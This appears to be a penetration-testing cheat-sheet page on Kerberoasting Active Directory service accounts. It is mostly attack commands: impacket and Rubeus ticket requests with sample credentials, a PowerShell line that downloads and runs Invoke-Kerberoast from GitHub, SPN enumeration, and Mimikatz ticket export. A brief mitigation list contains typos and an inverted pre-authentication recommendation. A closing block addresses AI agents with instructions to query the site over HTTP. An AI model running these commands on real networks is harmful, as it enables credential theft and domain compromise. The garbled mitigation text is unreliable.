# Kerberoasting

the TGS encrypted using a password service account

<figure><img src="/files/89damQnrhSXyfBLGmJfl" alt=""><figcaption><p>the TGS encrypted using password service account</p></figcaption></figure>

{% hint style="warning" %}
The Kerberos session ticket (TGS) has a server portion that is encrypted with the password hash of the service account. This makes it possible to request a ticket and do an offline password attack
{% endhint %}

### **Linux**

<pre class="language-bash" data-overflow="wrap"><code class="lang-bash"><strong>impacket-GetUsersSPNs hacktor.local/triceratops:Sh4rpH0rns -outputfile hashes.kerberoast
</strong><strong>
</strong>impacket-GetUserSPNs remo.htb/'o.rashed':'MyP@ssw0rd!' -target-domain remo.htb -dc-ip 10.0.2.10 -request -request-user "m.nathan" -outputfile crackme.txt
</code></pre>

<figure><img src="/files/4dd8c2ghc5fdizeTTld7" alt=""><figcaption></figcaption></figure>

### **Windows**

{% code overflow="wrap" %}

```bash
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
#Using power-kerb
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")

nvoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast
```

{% endcode %}

### Enumeration

<pre class="language-bash"><code class="lang-bash">#Find user accounts used as Service accounts
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
Get-NetUser -SPN 
Get-DomainUser -SPN
#using impacket tools
<strong>impacket-GetUserSPNs hacktor.local/grey:digi@123 -dc-ip 192.168.1.50 -request
</strong></code></pre>

### Rubeus

{% code overflow="wrap" %}

```powershell
Rubeus.exe kerberoast /stats
Rubeus.exe kerberoast /user:svcadmin /simple
#Kerberoast all possible accounts
Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
Rubeus.exe kerberoast  /outfile:hashes.txt
#OR Native Command
Add-Type -AssemblyName System.IdentityModel ;New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/msp-sqlreport.msp.local"  
```

{% endcode %}

### mimikatz

```powershell
Invoke-Mimikatz -Command '"kerberos::list /export"'

```

### Kerberos Mitigations

In order to prevent or mitigate many of these Kerberos attacks a series of policies can be implemented. Some examples are the following:

* **Enable an strong password policy**: First step is to avoid having weak passwords in domain user accounts. To achieve this an strong password policy should be implemented, by ensuring that complex password option is enabled on Active Directory domain. Moreover, blacklisting some common predictable terms in passwords as company names, year or months names.
* **Avoid accounts without pre-authentication**: If it is no completely necessary, none account must have Kerberos pre-authentication enabled. In case that this cannot be avoided, take note of these special accounts and create pseudo-random passwords with high level of complexity.
* **Avoid executing services in behalf of account accounts**: Avoid services that run in domain user account context. In case of using an special user account for launch domain services, generate an strong pseudo-random password for that account.
* **Verify PAC**: Enable PAC verification in order to avoid attacks such as Silver Ticket. To enable this check set the value *ValidateKdcPacSignature* (DWORD) in subkey *HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters* to 1.
* **Change passwords periodically**: Set policies to ensure that user passwords are periodically modified, for example, each 2 to 4 months. As special case, *krbtgt* account password should also be changed periodically, since that key is used to create TGTs. To this purpose, the script <https://github.com/microsoft/New-KrbtgtKeys.ps1> can be used. It must be taken into account that *krbtgt* password must be modified twice to invalidate current domain tickets, for cache reasons. Another consideration is that the functional level of domain must be equal or higher than Windows Server 2008 in order to manipulate *krbtgt* account credentials.
* **Disable Kerberos weak encryption types**: Only Kerberos encryption with AES keys should be allowed. Furthermore, Kerberos requests with a lower level of encryption as RC4 should be monitored, due is usually used by attack tools.

Resources&#x20;

{% embed url="<https://www.microsoft.com/en-us/download/details.aspx?id=36036>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://h3ckt0r.gitbook.io/0xsec/elite/network-pentest/active-directory/ad-techniques/domain-privesc/kerberoasting.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.